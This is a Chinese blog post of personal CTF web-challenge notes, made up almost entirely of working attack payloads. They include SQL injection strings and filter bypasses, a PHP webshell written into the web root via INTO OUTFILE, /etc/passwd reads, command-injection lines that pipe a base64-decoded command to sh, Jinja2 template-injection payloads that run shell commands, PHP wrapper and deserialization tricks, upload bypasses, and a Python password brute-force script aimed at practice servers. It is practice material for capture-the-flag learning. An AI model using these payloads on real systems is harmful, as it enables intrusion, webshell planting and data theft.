ctf笔记20211016

最新推荐文章于 2023-12-25 23:41:40 发布
最新推荐文章于 2023-12-25 23:41:40 发布
阅读量251 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62315240/article/details/120802504
版权

C:\Python27\sqlmap\data
keywords.txt
error_based.xml 222
queries.xml 50
X-Forwarded-For.py
keepalive.py 321 Content-Type:application/x-www-form-urlencoded     

'; show databases;#
';show tables;--+
; show columns from concat('`F','lag`') ;
';set @sql=concat('s','elect * from `1919810931114514`');PREPARE pre FROM @sql;EXECUTE pre;--+
SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;
';handler `1919810931114514` open;handler `1919810931114514` read first;#

' or updatexml(1,concat(0x7e,(select 1)),0) or '
' or extractvalue(1,concat(0x5e24,(select 1))) or '

'  union select 1,2,GROUP_CONCAT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA #
'  union SELECT 1,2,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='geek' #
'  union SELECT 1,2,GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='l0ve1ysq1' #
' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

?id=-1+union+select+load_file('/etc/passwd')
?id=-1+union+select+'<?php eval($_POST['cmd']);?>'+into+outfile '/var/www/html/shell.php'
id=-1' and extractvalue(1,concat('^',(select database()),'^'))--+

利用/*!union*/可以绕过对union的过滤
0^(ascii(substr((select(flag)from(flag)),1,1))>1)
/**/代替空格
select unhex()
mysql> SELECT HEX(‘cat’);
        -> ’636174′
mysql> SELECT 0×636174;
        -> ‘cat’
SELECT UNHEX('746869732069732061207465737420737472'),查询的结果为:this is a test str


空格 () ` /**/ %0a
or || ^
and &&
%df%27

绕过后缀的有文件格式有php,php3,php4,php5,phtml.ph
修改后缀为1.php;.jpg
copy a.jpg/b + b.php c.jpg
修改后缀名为.htaccess,文件内容为
SetHandler application/x-httpd-php

127.0.0.1|cat$IFS$1`ls`
127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
show_source('flag.php')
highlight_file('flag.php')
system("tac flag.php")
file('flag.php')  var_dump
system("cat flag.php") view html source
{if phpinfo()}{/if}
system绕过:passthru  exec
cat绕过:less、more、tac
{passthru("more /*|grep fla")}
/index.php?f={print_r(scandir("/"))}
/index.php?f={var_dump(scandir("/"))} 
/index.php?f={fread(fopen("/_13075","r"),4096)} 
/index.php?f={fread(popen("/bin/bzless%20/_13075","r"),2096)} 
123;sleep 10
123|ls ../../../>test
cat</flag {cat,/flag}

Content-Type:application/x-www-form-urlencoded      


 这些超全局变量是:$GLOBALS $_SERVER $_GET $_POST $_FILES $_COOKIE $_SESSION _REQUEST $_ENV

flag={{config}}
{{''.__class__.__base__.__subclasses__()['catch_warnings'].__init__.__globals__['__builtins__'].eval("__import__('os').popen('env').read()")}}
{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
{{config['__class__']['__init__']['__glo'+'bals__']['__builtins__']['e'+'val']("__im"+"port__('o'+'s').po"+"pen('cat /this_is_the_fl'+'ag.txt').read()")}}

file:///flag
file=php://filter/read=convert.base64-encode/resource=useless.php
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
find / -name "*flag*" 
text=data://text/plain,I have a dream
php://input postdata
data:text/plain,(url编码的内容)
$eval( a='fla1';$a{3}='g';?><?=$$a;?> )

key1=QNKCDZO&key2=240610708
dasfdscsadfesfdvss

protected被序列化会变成:%00*%00属性名
private被序列化会变成:%00类名%00属性名
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}
unserialize(s:13:"ctf.bugku.com") === "ctf.bugku.com"


SSLKEYLOGFILE


========================================================

chr ord

import base64
import requests

s = base64.b64encode(b'O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}')
url = 'http://111.198.29.45:43225/'
params = {'var':s}
r = requests.get(url,params=params)
print(r.text)


import requests
import base64
import re #正则匹配模块
s = requests.session() #建立会话
url = "http://114.67.246.176:10777/"
head = s.get(url).headers #获取头部信息
result = head['flag'] #得到flag的value
result = base64.b64decode(result).decode('utf-8') #第一次base64解码
result = re.search('\w+$', result).group(0) #正则匹配base64编码的flag
result = base64.b64decode(result).decode('utf-8') #第二次解码
payload = {'margin': result}
print(s.post(url, data=payload).text) #post传输数据且输出返回信息


# coding=UTF-8
import sys
reload(sys)
sys.setdefaultencoding('utf8') 
# 弱口令爆破
import requests

def ssh():
    url = "http://114.67.246.176:14679/"
    for pwd in range(10000,100000):
        pwd = str(pwd)
        r = requests.post(url, data={'pwd': pwd})
        r.encoding = 'utf-8'
        r.headers
        r_text = r.text
        judge = "密码不正确,请重新输入"
        if (judge in r.text):
            print "{}".format(pwd)
        else:
            print "--{}--".format(pwd)
            print "ok" 
            break

ssh()


import requests #引入request库
import re         #引入re库
 
url = 'http://114.67.246.176:10730'
s = requests.session()  #用session会话保持表达式
retuen = s.get(url)
 
equation = re.search(r'(\d+[+\-*])+(\d+)',retuen.text).group()
result = eval(equation)    #eval()函数用来执行一个字符串表达式,并返回表达式的值。
 
key = {'value':result}#创建一个字典类型用于传参
flag = s.post(url,data=key)#用post方法传上去
 
print(flag.text)


import requests
url="http://node4.buuoj.cn:28577/Secret.php"
headers={
    "Referer": "https://www.Sycsecret.com",
    "Origin":"https://www.Sycsecret.com",
    "User-Agent": "Syclover",
    "X-Forwarded-For": "127.0.0.1"
}
r=requests.get(url=url,headers=headers)

print(r.text)
php---------------------------------------
$a= new Demo('fl4g.php');
$b=serialize($a);
$b=str_replace('O:4','O:+4',$b);
$b=str_replace('1:{','2:{',$b);
echo base64_encode($b);

SQL注入绕过技巧 - VVVinson - 博客园

SQL注入常用到的绕过方式-ctf_时光凉春衫薄的博客-优快云博客

ctf1024
关注
CTF知识点
weixin_48450741的博客
06-15 1037
CTF知识点binwalkforemostPDF字符'1qwk'弱等于数字1上传文件存在模板注入/?flag={{config}}!$GLOBALS签到题IDEA 字符串查找flagexiftooldbeaver反弹shellburpsuite binwalk binwalk -e 文件的位置 在CTF中Binwalk常用于分析隐藏文件 扫描选项: -B,-- signature 扫描目标文件的常见文件签名 -R,–raw = 扫描目标文件的指定字符序列 -A,–opcodes扫描目标文件中常见可执行代码
CTF解题笔记(3)
CODING...
01-10 5789
还是一个SQL注入的题目,以下使用SQLMAP爆破的方式以及手工注入的方式来解决这道题目:
ctf模拟赛题解
m0_74924621的博客
12-25 1754
显示f14g列名:b80bb7740288fda1f201890375a60c8f,327a6c4304ad5938eaf0efb6cc3e53dc。题目提示了支持中文,就可以想到宽字节,登陆之后发现有一个显示位,可以通过联合查询得到flag。发现可控的变量,已经知道是PHP的程序,我们开始用变量构造页面,构造一个phpinfo吧。只允许上传类型中有zip类型,那么可以将一句话木马压缩成zip文件上传,用蚁剑连接。查看index.bak:发现file:///和php://被禁用。
python中re.search()函数的用法
weixin_44305115的博客
10-15 2万+
说到使用正则匹配字符串,就不得不说三个常用的匹配检索方法:re.search(),re.match()和re.findall()。 主要的区别是前两个方法只在目标字符串中匹配一次满足条件的正则表达式;而re.findall()方法匹配目标字符串中所有满足条件的正则表达式;另外re.match()只会匹配目标字符串开头是否满足正则表达式,若开头不满足则匹配失败,函数返回None;而re.search()则不限位置。 至于具体的细节,请参考: Python 正则表达式 我这里想说的是re.search()方法的
【实验吧】CTF_Web_简单的SQL注入之3
weixin_30839881的博客
11-16 5867
实验吧第二题 who are you? 很有意思,过两天好好分析写一下。简单的SQL注入之3也很有意思,适合做手工练习,详细分析见下。 http://ctf5.shiyanbar.com/web/index_3.php 随便输入111' 便报错,由报错内容可知较多信息: 通过 1' and '1'='1 返回正确, 1' and '1'='2 返回错误可知,当输入正确值的时候...
php的filter协议ctf,PHP之filter协议
weixin_33274728的博客
04-08 704
php:// — 访问各个输入/输出流(I/O streams)php://input 是个可以访问请求的原始数据的只读流。php://filter 是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数非常有用,否则就没有机会在读取内容之前将过滤器应用于流之上。该协议语法为:php://filter:/=比如 php://filter:/resource=http...
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
ctf笔记 杂项 web 密码学基础笔记
07-05
### CTF笔记:杂项、Web与密码学基础 #### 一、文件处理技术 **1.1 文件分离** 在CTF竞赛中,文件分离是一项常见的技能,用于从复合文件中提取有用的数据。 - **Binwalk**: 是一个强大的工具,可以用来识别文件...
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
网安 重要 ctf -笔记.xlsx
12-02
网安 重要 ctf -笔记
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
oj.xctf.org.cn ctf平台的可供练习的题库
如梦山河
10-29 2093
链接地址是:http://oj.xctf.org.cn 平台会给我一些题库的链接,根据题库IP进行1-65535的端口扫描,会发现一些其他题 http://202.112.51.184:10085 http://202.112.51.184:10093 http://202.112.51.184:13080 http://202.112.51.184:15080 http://202.112...
i春秋试验场 CTF答题夺旗赛(第四季)
A_dmin的博客
12-29 1629
i春秋试验场 CTF答题夺旗赛(第四季) web nani 进入查看源码可以看见: 添加参数file,提示一个user.php,发现存在文件包含,直接进行文件读取,得到user.php的源码: <?php class convent{ var $warn = "No hacker."; function __destruct(){ eval($this->warn); } ...
CTF初识与深入
hl1293348082的专栏
04-10 581
这段时间一直在忙活CTF相关的东西,从参赛者到出题人,刷过一些题,也初步了解了出题人的逻辑;这篇文章就简单地讲一下CTF如何入门以及如何深入的学习、利用CTF这个训练、学习平台。 文章里会涉及的一些资源:http://pan.baidu.com/s/1jIDpV8q CTF认知 CTF可以理解成一种锻炼和学习信息安全技术的训练场,具体的解释在百度以及这篇安全维基~上都有,就不再赘述了。而CTF对信安人员的意义,在我看来,是扩宽我们的安全知识面,以及实战式应用我们学到的安全知识。随着《网络安全法》的公布
Python3 re.search()方法
热门推荐
Rustone的博客
11-19 17万+
re.search()方法扫描整个字符串,并返回第一个成功的匹配。如果匹配失败,则返回None。 与re.match()方法不同,re.match()方法要求必须从字符串的开头进行匹配,如果字符串的开头不匹配,整个匹配就失败了; re.search()并不要求必须从字符串的开头进行匹配,也就是说,正则表达式可以是字符串的一部分。 re.search(pattern, string, fla...
BugKu - Web - Simple_SSTI_1
1tachi的博客
12-28 2108
Simple_SSTI_1 猜测GET传参flag:?flag=1 测试注入:?flag=${7*7} ?flag={{7*7}} ?flag={{7*'7'}} 所以该模板使用的是jinja2渲染:?flag={{[].__class__.__base__.__subclasses__()}} ?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("ls").read()}} ?fl
各大CTFoj 刷题整合 不再更新
qq_41071646的博客
10-18 1621
有些oj 还没有刷很多 不断更新中 。。。 Jarvis OJ : re https://blog.youkuaiyun.com/qq_41071646/article/details/102502586 pwn https://blog.youkuaiyun.com/qq_41071646/article/details/88878453 实验吧 re https://blog.csdn.ne...
python正则 .* 和 .*? 有什么区别?re.search()用法
weixin_44285715的博客
10-27 4613
.* 和 .*? 有什么区别? * 通配符匹配零个或多个字符 ? 通配符匹配文件名中的 0 个或 1 个字符 表达式 .* 就是单个字符匹配任意次,即贪婪匹配。 表达式 .*? 是满足条件的情况只匹配一次,即最小匹配。 比如说匹配输入串B: 101000000000100 使用 1.*1 将会匹配到1010000000001, 匹配方法: 先匹配至输入串B的最后, 然后向前匹配, 直到可以匹配到1, 称之为贪婪匹配。 使用 1.?1 将会匹配到101, 匹配方法: 匹配下一个1之前...
一天一道ctf 第56天(ascii偏移盲注)
scrawman的博客
08-18 592
[GYCTF2020]Ezsqli 先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。 import requests import time url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/" flag = "" payload = "1^(a
ctf笔记
最新发布
03-18
### 关于CTF竞赛的笔记与资料 #### CTF竞赛概述 CTF(Capture The Flag)是一种流行的网络安全竞赛形式,其目标是通过解决各种技术挑战来捕获旗帜[^1]。这种比赛通常分为三种主要赛制:解题模式(Jeopardy)、攻防...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值